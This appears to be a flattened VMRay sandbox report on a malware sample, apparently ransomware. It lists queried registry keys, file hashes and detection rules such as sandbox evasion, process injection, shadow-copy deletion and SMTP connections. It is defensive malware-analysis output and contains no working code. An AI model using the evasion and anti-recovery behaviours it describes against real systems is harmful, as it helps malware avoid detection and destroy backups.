Software\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
ServiceStackVersion
ServiceStackVersion
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
WinRegistryKey
SOFTWARE\Microsoft\Wbem\CIMOM
HKEY_LOCAL_MACHINE
Logging
Logging Directory
Logging Directory
Log File Max Size
Analyzed Sample #1664761
Malware Artifacts
1664761
Sample-ID: #1664761
Job-ID: #4952696
This sample was analyzed by VMRay Analyzer 3.2.2 on a Windows 10 Redstone 2 system
100
VTI Score based on VTI Database Version 3.6
Metadata of Sample File #1664761
Submission-ID: #5538319
4444458bf47925c82431843fd147aabbfbee71ca849fc711cb69b0cea01f4747exe
MD5
956090ecfd9dc1986e4ae0afd782c1d3
SHA1
230aa8c348dcfa88698d2aaaae694d623c19b76b
SHA256
4444458bf47925c82431843fd147aabbfbee71ca849fc711cb69b0cea01f4747
Opened_By
Metadata of Analysis for Job-ID #4952696
True
Timeout
True
1200.098
NQDPDE
win10_64_rs2
x86 64-bit
Windows 10 Redstone 2
10.0.15063.540 (f6f48955-5489-4b24-b4df-942361f0730d)
FD1HVy
NQDPDE
This is a property collection for additional information of VMRay analysis
VMRay Analyzer
Hide Tracks
VTI rule match with VTI rule score 1/5
vmray_create_process_with_hidden_window
The process "C:\Users\FD1HVy\Desktop\vinfk.exe" starts with hidden window.
Creates process with hidden window
Obfuscation
VTI rule match with VTI rule score 1/5
vmray_read_from_remote_process
"c:\users\fd1hvy\desktop\vinfk.exe" reads from "C:\Users\FD1HVy\Desktop\vinfk.exe".
Reads from memory of another process
Obfuscation
VTI rule match with VTI rule score 1/5
vmray_allocate_wx_page
Allocates a page in a foreign process with "PAGE_EXECUTE_READWRITE" permissions, often used to dynamically unpack code.
Creates a page with write and execute permissions
Obfuscation
VTI rule match with VTI rule score 2/5
vmray_dynamic_api_usage_by_api
Resolves an unusually high number of APIs.
Resolves APIs dynamically to possibly evade static detection
Anti Analysis
VTI rule match with VTI rule score 2/5
vmray_detect_forensic_tool_by_module
Tries to detect forensic tools by checking if the DLL "SunBelt Sandbox" exists.
Tries to detect a forensic tool
Anti Analysis
VTI rule match with VTI rule score 3/5
vmray_detect_application_sandbox_by_dll
Tries to detect "SunBelt Sandbox" by checking for existence of module "api_log.dll".
Tries to detect application sandbox
Discovery
VTI rule match with VTI rule score 0/5
vmray_enumerate_processes
Enumerates running processes.
Enumerates running processes
Hide Tracks
VTI rule match with VTI rule score 1/5
vmray_create_process_with_hidden_window
The process "C:\WINDOWS\system32\cmd.exe" starts with hidden window.
Creates process with hidden window
Hide Tracks
VTI rule match with VTI rule score 1/5
vmray_create_process_with_hidden_window
The process "C:\WINDOWS\system32\reg.exe" starts with hidden window.
Creates process with hidden window
Network Connection
VTI rule match with VTI rule score 1/5
vmray_request_dns_by_name
Resolves host name "smtp.gmail.com".
Performs DNS request
Discovery
VTI rule match with VTI rule score 2/5
vmray_read_net_adapter_addresses_by_api
Reads the network adapters' addresses by API.
Reads network adapter information
Hide Tracks
VTI rule match with VTI rule score 1/5
vmray_create_process_with_hidden_window
The process "C:\WINDOWS\system32\forfiles.exe" starts with hidden window.
Creates process with hidden window
System Modification
VTI rule match with VTI rule score 2/5
vmray_set_desktop_wallpaper_by_api
Sets the desktop wallpaper to the file "c:\users\fd1hvy\appdata\local\temp\meme.jpg".
Changes the desktop wallpaper.
Anti Analysis
VTI rule match with VTI rule score 2/5
vmray_detect_generic_vm_by_rdtsc
Possibly trying to detect VM via rdtsc.
Tries to detect virtual machine
Anti Analysis
VTI rule match with VTI rule score 2/5
vmray_create_many_processes
Above average number of processes were monitored.
Creates an unusually large number of processes
System Modification
VTI rule match with VTI rule score 1/5
vmray_create_many_files
Creates above average number of files.
Creates an unusually large number of files
User Data Modification
VTI rule match with VTI rule score 4/5
vmray_modify_windows_backup_settings
Deletes Windows volume shadow copies.
Modifies Windows automatic backups
Antivirus
VTI rule match with VTI rule score 5/5
vmray_av_malicious_match
Local AV detected the sample itself as "Trojan.GenericKD.43826496".
Malicious content was detected by heuristic scan
Antivirus
VTI rule match with VTI rule score 5/5
vmray_av_malicious_match
Local AV detected a memory dump of process "vinfk.exe" as "Gen:Heur.Ransom.Imps.1".
Malicious content was detected by heuristic scan
Injection
VTI rule match with VTI rule score 2/5
vmray_modify_memory
"c:\users\fd1hvy\desktop\vinfk.exe" modifies memory of "c:\users\fd1hvy\desktop\vinfk.exe".
Writes into the memory of a process running from a created or modified executable
Injection
VTI rule match with VTI rule score 2/5
vmray_modify_control_flow_non_system
"c:\users\fd1hvy\desktop\vinfk.exe" alters context of "c:\users\fd1hvy\desktop\vinfk.exe".
Modifies control flow of a process running from a created or modified executable
Network Connection
VTI rule match with VTI rule score 1/5
vmray_tcp_out_connection
Outgoing TCP connection to host "74.125.205.109:587".
Connects to remote host
Network Connection
VTI rule match with VTI rule score 1/5
vmray_connect_on_uncommon_port
Tries to connect to TCP port 587 at 74.125.205.109.
Tries to connect using an uncommon port
Reputation
VTI rule match with VTI rule score 5/5
vmray_known_malicious_file
Reputation data labels the sample itself as "Mal/Generic-S".
Known malicious file
Static Analysis Remark
VTI rule match with VTI rule score 1/5
vmray_static_analysis_parser_error
Static engine was unable to completely parse the analyzed file: C:\Users\FD1HVy\Desktop\vinfk.exe.
Unparsable sections in file